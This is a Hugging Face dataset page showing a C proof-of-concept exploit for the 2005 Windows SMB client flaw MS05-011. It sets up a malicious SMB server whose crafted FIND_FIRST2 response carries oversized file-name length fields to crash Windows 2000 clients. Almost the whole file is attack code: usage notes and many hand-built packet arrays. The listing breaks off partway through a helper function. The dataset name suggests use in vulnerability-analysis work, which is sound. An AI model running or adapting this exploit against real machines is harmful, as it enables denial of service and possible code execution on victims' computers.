Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1065.txt950 linesDownload Raw Back to exploits
1/*

2 * Windows SMB Client Transaction Response Handling

3 *

4 * MS05-011

5 * CAN-2005-0045

6 *

7 * This works against >> Win2k <<

8 *

9 * cybertronic[at]gmx[dot]net

10 * http://www.livejournal.com/users/cybertronic/

11 *

12 * usage:

13 * gcc -o mssmb_poc mssmb_poc.c

14 * ./mssmb_poc

15 *

16 * connect via \\ip

17 * and hit the netbios folder!

18 *

19 * ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,

20 *                      0x00000000)

21 * PAGE_FAULT_IN_NONPAGED_AREA

22 *

23 * The Client reboots immediately

24 *

25 * Technical Details:

26 * -----------------

27 *

28 * The driver MRXSMB.SYS is responsible for performing SMB

29 * client operations and processing the responses returned

30 * by an SMB server service. A number of important Windows

31 * File Sharing operations, and all RPC-over-named-pipes,

32 * use the SMB commands Trans (25h) and Trans2 (32h). A

33 * malicious SMB server can respond with specially crafted

34 * Transaction response data that will cause an overflow

35 * wherever the data is handled, either in MRXSMB.SYS or

36 * in client code to which it provides data. One example

37 * would be if the

38 *

39 * file name length field

40 *

41 * and the

42 *

43 * short file name length field

44 *

45 * in a Trans2 FIND_FIRST2 response packet can be supplied

46 * with inappropriately large values in order to cause an

47 * excessive memcpy to occur when the data is handled.

48 * In the case of these examples an attacker could leverage

49 * file:// links, that when clicked by a remote user, would

50 * lead to code execution.

51 *

52 */

53

54#include <stdio.h>

55#include <sys/socket.h>

56#include <netinet/in.h>

57#include <netdb.h>

58

59#define PORT	445

60

61unsigned char SmbNeg[] =

62"\x00\x00\x00\x55"

63"\xff\x53\x4d\x42"                 // SMB

64"\x72"                             // SMB Command: Negotiate Protocol (0x72)

65"\x00\x00\x00\x00"                 // NT Status: STATUS_SUCCESS (0x00000000)

66"\x98"                             // Flags: 0x98

67"\x53\xc8"                         // Flags2 : 0xc853

68"\x00\x00"                         // Process ID High: 0

69"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000

70"\x00\x00"                         // Reserved: 0000

71"\x00\x00"                         // Tree ID: 0

72"\xff\xfe"                         // Process ID: 65279

73"\x00\x00"                         // User ID: 0

74"\x00\x00"                         // Multiplex ID: 0

75"\x11"                             // Word Count (WCT): 17

76"\x05\x00"                         // Dialect Index: 5, greater than LANMAN2.1

77"\x03"                             // Security Mode: 0x03

78"\x0a\x00"                         // Max Mpx Count: 10

79"\x01\x00"                         // Max VCs: 1

80"\x04\x11\x00\x00"                 // Max Buffer Size: 4356

81"\x00\x00\x01\x00"                 // Max Raw Buffer 65536

82"\x00\x00\x00\x00"                 // Session Key: 0x00000000

83"\xfd\xe3\x00\x80"                 // Capabilities: 0x8000e3fd

84"\x52\xa2\x4e\x73\xcb\x75\xc5\x01" // System Time: Jun 20, 2005 12:08:32.327125000

85"\x88\xff"                         // Server Time Zone: /120 min from UTC

86"\x00"                             // Key Length: 0

87"\x10\x00"                         // Byte Count (BCC): 16

88"\x9e\x12\xd7\x77\xd4\x59\x6c\x40" // Server GUID: 9E12D777D4596C40

89"\xbc\xc0\xb4\x22\x40\x50\x01\xd4";//              BCC0B422405001D4

90

91unsigned char SessionSetupAndXNeg[] = // Negotiate ERROR Response

92"\x00\x00\x01\x1b"

93"\xff\x53\x4d\x42\x73\x16\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"

94"\x00\x00\x00\x00\x00\x00\x00\x00"

95"\x00\x00"                         // Tree ID: 0

96"\x00\x00"                         // Process ID: 0

97"\x00\x00"                         // USER ID

98"\x00\x00"                         // Multiplex ID: 0

99"\x04\xff\x00\x1b\x01\x00\x00\xa6\x00\xf0\x00\x4e\x54\x4c\x4d\x53"

100"\x53\x50\x00\x02\x00\x00\x00\x12\x00\x12\x00\x30\x00\x00\x00\x15"

101"\x82\x8a\xe0"

102"\x00\x00\x00\x00\x00\x00\x00\x00" // NTLM Challenge

103"\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x64\x00\x42\x00\x00\x00"

104"\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00"

105"\x43\x00\x02\x00\x12\x00\x53\x00\x45\x00\x52\x00\x56\x00\x49\x00"

106"\x43\x00\x45\x00\x50\x00\x43\x00\x01\x00\x12\x00\x53\x00\x45\x00"

107"\x52\x00\x56\x00\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x04\x00"

108"\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00"

109"\x70\x00\x63\x00\x03\x00\x12\x00\x73\x00\x65\x00\x72\x00\x76\x00"

110"\x69\x00\x63\x00\x65\x00\x70\x00\x63\x00\x06\x00\x04\x00\x01\x00"

111"\x00\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"

112"\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x57"

113"\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"

114"\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00\x41\x00\x4e\x00\x20"

115"\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72\x00\x00";

116

117unsigned char SessionSetupAndXAuth[] =

118"\x00\x00\x00\x75"

119"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

120"\x00\x00\x00\x00\x00\x00\x00\x00"

121"\x00\x00"                         // Tree ID: 0

122"\x00\x00"                         // Process ID: 0

123"\x00\x00"                         // USER ID

124"\x00\x00"                         // Multiplex ID: 0

125"\x04\xff\x00\x75\x00\x01\x00\x00\x00\x4a\x00\x4e\x57\x00\x69\x00"

126"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x35\x00\x2e\x00"

127"\x31\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"

128"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x4c\x00"

129"\x41\x00\x4e\x00\x20\x00\x4d\x00\x61\x00\x6e\x00\x61\x00\x67\x00"

130"\x65\x00\x72\x00\x00";

131

132unsigned char TreeConnectAndX[] =

133"\x00\x00\x00\x38"

134"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

135"\x00\x00\x00\x00\x00\x00\x00\x00"

136"\x00\x00"                         // Tree ID: 0

137"\x00\x00"                         // Process ID: 0

138"\x00\x00"                         // USER ID

139"\x00\x00"                         // Multiplex ID: 0

140"\x07\xff\x00\x38\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x07"

141"\x00\x49\x50\x43\x00\x00\x00\x00";

142

143unsigned char SmbNtCreate [] =

144"\x00\x00\x00\x87"

145"\xff\x53\x4d\x42"                 // SMB

146"\xa2"                             // SMB Command: NT Create AndX (0xa2)

147"\x00\x00\x00\x00"                 // NT Status: STATUS_SUCCESS (0x00000000)

148"\x98"                             // Flags: 0x98

149"\x07\xc8"                         // Flags2 : 0xc807

150"\x00\x00"                         // Process ID High: 0

151"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000

152"\x00\x00"                         // Reserved: 0000

153"\x00\x00"                         // Tree ID: 0

154"\x00\x00"                         // Process ID: 0

155"\x00\x00"                         // User ID: 0

156"\x00\x00"                         // Multiplex ID: 0

157"\x2a"                             // Word Count (WCT): 42

158"\xff"                             // AndXCommand: No further commands (0xff)

159"\x00"                             // Reserved: 00

160"\x87\x00"                         // AndXOffset: 135

161"\x00"                             // Oplock level: No oplock granted (0)

162"\x00\x00"                         // FID: 0

163"\x01\x00\x00\x00"                 // Create action: The file existed and was opened (1)

164"\x00\x00\x00\x00\x00\x00\x00\x00" // Created: No time specified (0)

165"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Access: No time specified (0)

166"\x00\x00\x00\x00\x00\x00\x00\x00" // Last Write: No time specified (0)

167"\x00\x00\x00\x00\x00\x00\x00\x00" // Change: No time specified (0)

168"\x80\x00\x00\x00"                 // File Attributes: 0x00000080

169"\x00\x10\x00\x00\x00\x00\x00\x00" // Allocation Size: 4096

170"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0

171"\x02\x00"                         // File Type: Named pipe in message mode (2)

172"\xff\x05"                         // IPC State: 0x05ff

173"\x00"                             // Is Directory: This is NOT a directory (0)

174"\x00\x00"                         // Byte Count (BCC): 0

175

176// crap

177"\x00\x00\x00\x0f\x00\x00\x00\x00"

178"\x00\x74\x7a\x4f\xac\x2d\xdf\xd9"

179"\x11\xb9\x20\x00\x10\xdc\x9b\x01"

180"\x12\x00\x9b\x01\x12\x00\x1b\xc2";

181

182unsigned char DceRpc[] =

183"\x00\x00\x00\x7c"

184"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

185"\x00\x00\x00\x00\x00\x00\x00\x00"

186"\x00\x00"                         // Tree ID: 0

187"\x00\x00"                         // Process ID: 0

188"\x00\x00"                         // USER ID

189"\x00\x00"                         // Multiplex ID: 0

190"\x0a\x00\x00\x44\x00\x00\x00\x00\x00\x38\x00\x00\x00\x44\x00\x38"

191"\x00\x00\x00\x00\x00\x45\x00\x00\x05\x00\x0c\x03\x10\x00\x00\x00"

192"\x44\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10"

193"\x00\x00\x00\x00"                 // Assoc Group

194"\x0d\x00\x5c\x50\x49\x50\x45\x5c"

195"\x00\x00\x00"                     // srv or wks

196"\x73\x76\x63\x00\xff\x01\x00\x00\x00\x00\x00\x00\x00\x04\x5d\x88"

197"\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00"

198"\x00";

199

200unsigned char WksSvc[] =

201"\x00\x00\x00\xb0"

202"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

203"\x00\x00\x00\x00\x00\x00\x00\x00"

204"\x00\x00"                         // Tree ID: 0

205"\x00\x00"                         // Process ID: 0

206"\x00\x00"                         // USER ID

207"\x00\x00"                         // Multiplex ID: 0

208"\x0a\x00\x00\x78\x00\x00\x00\x00\x00\x38\x00\x00\x00\x78\x00\x38"

209"\x00\x00\x00\x00\x00\x79\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

210"\x78\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00"

211"\x64\x00\x00\x00\xb8\x0f\x16\x00\xf4\x01\x00\x00\xe6\x0f\x16\x00"

212"\xd2\x0f\x16\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0a\x00\x00\x00"

213"\x00\x00\x00\x00\x0a\x00\x00\x00\x53\x00\x45\x00\x52\x00\x56\x00"

214"\x49\x00\x43\x00\x45\x00\x50\x00\x43\x00\x00\x00\x0a\x00\x00\x00"

215"\x00\x00\x00\x00\x0a\x00\x00\x00\x57\x00\x4f\x00\x52\x00\x4b\x00"

216"\x47\x00\x52\x00\x4f\x00\x55\x00\x50\x00\x00\x00\x00\x00\x00\x00";

217

218unsigned char SrvSvc[] =

219"\x00\x00\x00\xac"

220"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

221"\x00\x00\x00\x00\x00\x00\x00\x00"

222"\x00\x00"                         // Tree ID: 0

223"\x00\x00"                         // Process ID: 0

224"\x00\x00"                         // USER ID

225"\x00\x00"                         // Multiplex ID: 0

226"\x0a\x00\x00\x74\x00\x00\x00\x00\x00\x38\x00\x00\x00\x74\x00\x38"

227"\x00\x00\x00\x00\x00\x75\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

228"\x74\x00\x00\x00\x01\x00\x00\x00\x5c\x00\x00\x00\x00\x00\x00\x00"

229"\x65\x00\x00\x00\x68\x3d\x14\x00\xf4\x01\x00\x00"

230"\x80\x3d\x14\x00"                                                 // Server IP

231"\x05\x00\x00\x00\x01\x00\x00\x00\x03\x10\x05\x00\x9c\x3d\x14\x00"

232"\x0e\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00"

233"\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00" // Server IP ( UNICODE )

234"\x32\x00\x2e\x00\x31\x00\x30\x00\x33\x00\x00\x00"

235"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x55\x00"

236"\x00\x00\x00\x00";

237

238unsigned char SmbClose[] =

239"\x00\x00\x00\x23"

240"\xff\x53\x4d\x42"                 // SMB

241"\x04"                             // SMB Command: Close (0x04)

242"\x00\x00\x00\x00"                 // NT Status: STATUS_SUCCESS (0x00000000)

243"\x98"                             // Flags: 0x98

244"\x07\xc8"                         // Flags2 : 0xc807

245"\x00\x00"                         // Process ID High: 0

246"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000

247"\x00\x00"                         // Reserved: 0000

248"\x00\x00"                         // Tree ID: 0

249"\x00\x00"                         // Process ID: 0

250"\x00\x00"                         // USER ID

251"\x00\x00"                         // Multiplex ID: 0

252"\x00"                             // Word Count (WCT): 0

253"\x00\x00";                        // Byte Count (BCC): 0

254

255unsigned char NetrShareEnum[] =

256"\x00\x00\x01\x90"

257"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

258"\x00\x00\x00\x00\x00\x00\x00\x00"

259"\x00\x00"                         // Tree ID: 0

260"\x00\x00"                         // Process ID: 0

261"\x00\x00"                         // USER ID

262"\x00\x00"                         // Multiplex ID: 0

263"\x0a\x00\x00\x58\x01\x00\x00\x00\x00\x38\x00\x00\x00\x58\x01\x38"

264"\x00\x00\x00\x00\x00\x59\x01\x00\x05\x00\x02\x03\x10\x00\x00\x00"

265"\x58\x01\x00\x00\x01\x00\x00\x00\x40\x01\x00\x00\x00\x00\x00\x00"

266"\x01\x00\x00\x00\x01\x00\x00\x00\x54\x0a\x17\x00\x04\x00\x00\x00"

267"\xa0\x28\x16\x00\x04\x00\x00\x00\x80\x48\x16\x00\x03\x00\x00\x80"

268"\x8a\x48\x16\x00\x6e\x48\x16\x00\x00\x00\x00\x00\x7e\x48\x16\x00"

269"\x48\x48\x16\x00\x00\x00\x00\x80\x56\x48\x16\x00\x20\x48\x16\x00"

270"\x00\x00\x00\x80\x26\x48\x16\x00\x05\x00\x00\x00\x00\x00\x00\x00"

271"\x05\x00\x00\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x36\x00"

272"\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x52\x00\x65\x00"

273"\x6d\x00\x6f\x00\x74\x00\x65\x00\x2d\x00\x49\x00\x50\x00\x43\x00"

274"\x00\x00\x37\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"

275"\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00"

276"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"

277"\x07\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x41\x00\x44\x00"

278"\x4d\x00\x49\x00\x4e\x00\x24\x00\x00\x00\x00\x00\x0c\x00\x00\x00"

279"\x00\x00\x00\x00\x0c\x00\x00\x00\x52\x00\x65\x00\x6d\x00\x6f\x00"

280"\x74\x00\x65\x00\x61\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x00\x00"

281"\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x43\x00\x24\x00"

282"\x00\x00\x39\x00\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00"

283"\x53\x00\x74\x00\x61\x00\x6e\x00\x64\x00\x61\x00\x72\x00\x64\x00"

284"\x66\x00\x72\x00\x65\x00\x69\x00\x67\x00\x61\x00\x62\x00\x65\x00"

285"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

286

287unsigned char OpenPrinterEx[] =

288"\x00\x00\x00\x68"

289"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

290"\x00\x00\x00\x00\x00\x00\x00\x00"

291"\x00\x00"                         // Tree ID: 0

292"\x00\x00"                         // Process ID: 0

293"\x00\x00"                         // USER ID

294"\x00\x00"                         // Multiplex ID: 0

295"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"

296"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

297"\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"

298"\x00\x00\x00\x00\x24\xd7\x9c\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10"

299"\xdc\x4a\x6b\xbb\x00\x00\x00\x00";

300

301unsigned char ClosePrinter[] =

302"\x00\x00\x00\x68"

303"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

304"\x00\x00\x00\x00\x00\x00\x00\x00"

305"\x00\x00"                         // Tree ID: 0

306"\x00\x00"                         // Process ID: 0

307"\x00\x00"                         // USER ID

308"\x00\x00"                         // Multiplex ID: 0

309"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"

310"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

311"\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"

312"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

313"\x00\x00\x00\x00\x00\x00\x00\x00";

314

315unsigned char OpenHklm[] =

316"\x00\x00\x00\x68"

317"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

318"\x00\x00\x00\x00\x00\x00\x00\x00"

319"\x00\x00"                         // Tree ID: 0

320"\x00\x00"                         // Process ID: 0

321"\x00\x00"                         // USER ID

322"\x00\x00"                         // Multiplex ID: 0

323"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"

324"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

325"\x30\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"

326"\x00\x00\x00\x00\x4e\x4c\xb2\xf8\xbb\xe1\xd9\x11\xb9\x29\x00\x10"

327"\xdc\x4a\x6b\xbb\x00\x00\x00\x00";

328

329unsigned char OpenKey[] =

330"\x00\x00\x00\x68"

331"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

332"\x00\x00\x00\x00\x00\x00\x00\x00"

333"\x00\x00"                         // Tree ID: 0

334"\x00\x00"                         // Process ID: 0

335"\x00\x00"                         // USER ID

336"\x00\x00"                         // Multiplex ID: 0

337"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"

338"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

339"\x30\x00\x00\x00\x02\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"

340"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

341"\x00\x00\x00\x00\x05\x00\x00\x00";

342

343unsigned char CloseKey[] =

344"\x00\x00\x00\x68"

345"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

346"\x00\x00\x00\x00\x00\x00\x00\x00"

347"\x00\x00"                         // Tree ID: 0

348"\x00\x00"                         // Process ID: 0

349"\x00\x00"                         // USER ID

350"\x00\x00"                         // Multiplex ID: 0

351"\x0a\x00\x00\x30\x00\x00\x00\x00\x00\x38\x00\x00\x00\x30\x00\x38"

352"\x00\x00\x00\x00\x00\x31\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

353"\x30\x00\x00\x00\x03\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00"

354"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

355"\x00\x00\x00\x00\x00\x00\x00\x00";

356

357unsigned char NetBios1[] =

358"\x00\x00\x00\x94"

359"\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

360"\x00\x00\x00\x00\x00\x00\x00\x00"

361"\x00\x00"                         // Tree ID: 0

362"\x00\x00"                         // Process ID: 0

363"\x00\x00"                         // USER ID

364"\x00\x00"                         // Multiplex ID: 0

365"\x0a\x00\x00\x5c\x00\x00\x00\x00\x00\x38\x00\x00\x00\x5c\x00\x38"

366"\x00\x00\x00\x00\x00\x5d\x00\x00\x05\x00\x02\x03\x10\x00\x00\x00"

367"\x5c\x00\x00\x00\x01\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00\x00"

368"\x01\x00\x00\x00\xc0\xa2\x16\x00\xae\xc2\x16\x00\x00\x00\x00\x00"

369"\xbe\xc2\x16\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00"

370"\x6e\x00\x65\x00\x74\x00\x62\x00\x69\x00\x6f\x00\x73\x00\x00\x00"

371"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x2e\x00"

372"\x00\x00\x00\x00";

373

374unsigned char NetBios2[] =

375"\x00\x00\x00\x3e"

376"\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x98\x07\xc8\x00\x00\x00\x00"

377"\x00\x00\x00\x00\x00\x00\x00\x00"

378"\x00\x00"                         // Tree ID: 0

379"\x00\x00"                         // Process ID: 0

380"\x00\x00"                         // USER ID

381"\x00\x00"                         // Multiplex ID: 0

382"\x07\xff\x00\x3e\x00\x01\x00\xff\x01\x00\x00\xff\x01\x00\x00\x0d"

383"\x00\x41\x3a\x00\x4e\x00\x54\x00\x46\x00\x53\x00\x00\x00";

384

385// Trans2 Response, QUERY_PATH_INFO

386unsigned char Trans2Response1[] =

387"\x00\x00\x00\x64"

388"\xff\x53\x4d\x42"                 // SMB

389"\x32"                             // SMB Command: Trans2 (0x32)

390"\x00\x00\x00\x00"                 // NT Status: STATUS_SUCCESS (0x00000000)

391"\x98"                             // Flags: 0x98

392"\x07\xc8"                         // Flags2 : 0xc807

393"\x00\x00"                         // Process ID High: 0

394"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000

395"\x00\x00"                         // Reserved: 0000

396"\x00\x00"                         // Tree ID: 0

397"\x00\x00"                         // Process ID: 0

398"\x00\x00"                         // USER ID

399"\x00\x00"                         // Multiplex ID: 0

400"\x0a"                             // Word Count (WCT): 10

401"\x02\x00"                         // Total Parameter Count: 2

402"\x28\x00"                         // Total Data Count: 40

403"\x00\x00"                         // Reserved: 0000

404"\x02\x00"                         // Parameter Count: 2

405"\x38\x00"                         // Parameter Offset: 56

406"\x00\x00"                         // Parameter Displacement: 0

407"\x28\x00"                         // Data Count: 40

408"\x3c\x00"                         // Data Offset: 60

409"\x00\x00"                         // Data Displacement: 0

410"\x00"                             // Setup Count: 0

411"\x00"                             // Reserved: 00

412"\x2d\x00"                         // Byte Count (BCC): 45

413"\x00"                             // Padding: 00

414"\x00\x00"                         // EA Error offset: 0

415"\x00\x01"                         // Padding: 0001

416"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000

417"\x8c\x24\xba\x5c\x3a\x73\xc5\x01" // Last Access: Jun 17, 2005 05:44:55.092750000

418"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000

419"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change:  Jun 17, 2005 05:39:25.717750000

420"\x10\x00\x00\x00"                 // File Attributes: 0x00000010

421"\x00\x00\x00\x00";                // Unknown Data: 00000000

422

423// Trans2 Response, QUERY_PATH_INFO

424unsigned char Trans2Response2[] = // ERROR Response

425"\x00\x00\x00\x23"

426"\xff\x53\x4d\x42\x32\x34\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00"

427"\x00\x00\x00\x00\x00\x00\x00\x00"

428"\x00\x00"                         // Tree ID: 0

429"\x00\x00"                         // Process ID: 0

430"\x00\x00"                         // USER ID

431"\x00\x00"                         // Multiplex ID: 0

432"\x00\x00\x00";

433

434// Trans2 Response, FIND_FIRST2, Files: . ..

435unsigned char Trans2Response3[] =

436"\x00\x00\x01\x0c"

437"\xff\x53\x4d\x42"                 // SMB

438"\x32"                             // SMB Command: Trans2 (0x32)

439"\x00\x00\x00\x00"                 // NT Status: STATUS_SUCCESS (0x00000000)

440"\x98"                             // Flags: 0x98

441"\x07\xc8"                         // Flags2 : 0xc807

442"\x00\x00"                         // Process ID High: 0

443"\x00\x00\x00\x00\x00\x00\x00\x00" // Signature: 0000000000000000

444"\x00\x00"                         // Reserved: 0000

445"\x00\x00"                         // Tree ID: 0

446"\x00\x00"                         // Process ID: 0

447"\x00\x00"                         // USER ID

448"\x00\x00"                         // Multiplex ID: 0

449"\x0a"                             // Word Count (WCT): 10

450"\x0a\x00"                         // Total Parameter Count: 10

451"\xc8\x00"                         // Total Data Count: 200

452"\x00\x00"                         // Reserved: 0000

453"\x0a\x00"                         // Parameter Count: 10

454"\x38\x00"                         // Parameter Offset: 56

455"\x00\x00"                         // Parameter Displacement: 0

456"\xc8\x00"                         // Data Count: 200

457"\x44\x00"                         // Data Offset: 68

458"\x00\x00"                         // Data Displacement: 0

459"\x00"                             // Setup Count: 0

460"\x00"                             // Reserved: 00

461"\xd5\x00"                         // Byte Count (BCC): 213

462"\x00"                             // Padding: 00

463"\x01\x08"                         // Search ID: 0x0801

464"\x02\x00"                         // Seatch Count: 2

465"\x01\x00"                         // End of Search: 1

466"\x00\x00"                         // EA Error offset: 0

467"\x60\x00"                         // Last Name offset: 96

468"\x38\x00"                         // Padding: 3800

469"\x60\x00\x00\x00"                 // Next Entry offset: 96

470"\x00\x00\x00\x00"                 // File Index: 0

471"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000

472"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000

473"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000

474"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change:  Jun 17, 2005 05:39:25.717750000

475"\x00\x00\x00\x00\x00\x00\x00\x00" // End of File: 0

476"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0

477"\x10\x00\x00\x00"                 // File Attributes: 0x00000010

478//"\x02\x00\x00\x00"               // File Name Len: 2

479"\xff\xff\xff\xff"                 // Bad File Name Len

480"\x00\x00\x00\x00"                 // EA List Length: 0

481//"\x00"                           // Short File Name Len: 0

482"\xff"                             // Bad Short File Name Len

483"\x00"                             // Reserved: 00

484"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:

485"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:

486"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:

487"\x2e\x00"                         // File Name: .

488"\x00\x00\x00\x00"                 // Next Entry Offset: 0

489"\x00\x00\x00\x00"                 // File Index: 0

490"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Created: Jun 17, 2005 05:39:19.686500000

491"\xac\x09\x3c\xae\x39\x73\xc5\x01" // Last Access: Jun 17, 2005 05:40:02.342750000

492"\xe8\x35\xcf\x94\x39\x73\xc5\x01" // Last Write: Jun 17, 2005 05:39:19.686500000

493"\x9c\x81\x67\x98\x39\x73\xc5\x01" // Change:  Jun 17, 2005 05:39:25.717750000

494"\x00\x00\x00\x00\x00\x00\x00\x00" // End Of File: 0

495"\x00\x00\x00\x00\x00\x00\x00\x00" // Allocation Size: 0

496"\x10\x00\x00\x00"                 // File Attributes: 0x00000010

497"\x04\x00\x00\x00"                 // File Name Len: 4

498"\x00\x00\x00\x00"                 // EA List Length: 0

499"\x00"                             // Short File Name Len: 0

500"\x00"                             // Reserved: 00

501"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:

502"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:

503"\x00\x00\x00\x00\x00\x00\x00\x00" // Short File Name:

504"\x2e\x00\x2e\x00"                 // File Name: ..

505"\x00\x00\x00\x00\x00\x00";        // Unknown Data: 000000000000

506

507int

508check_interface ( char* str )

509{

510	int i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;

511

512	//Interface UUID

513	unsigned char wks_uuid[] = "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a";

514	unsigned char srv_uuid[] = "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88";

515	unsigned char spl_uuid[] = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab";

516	unsigned char wrg_uuid[] = "\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03";

517

518	for ( i = 0; i < 16; i++ )

519	{

520		j = 0;

521		if ( str[120 + i] < 0 )

522		{

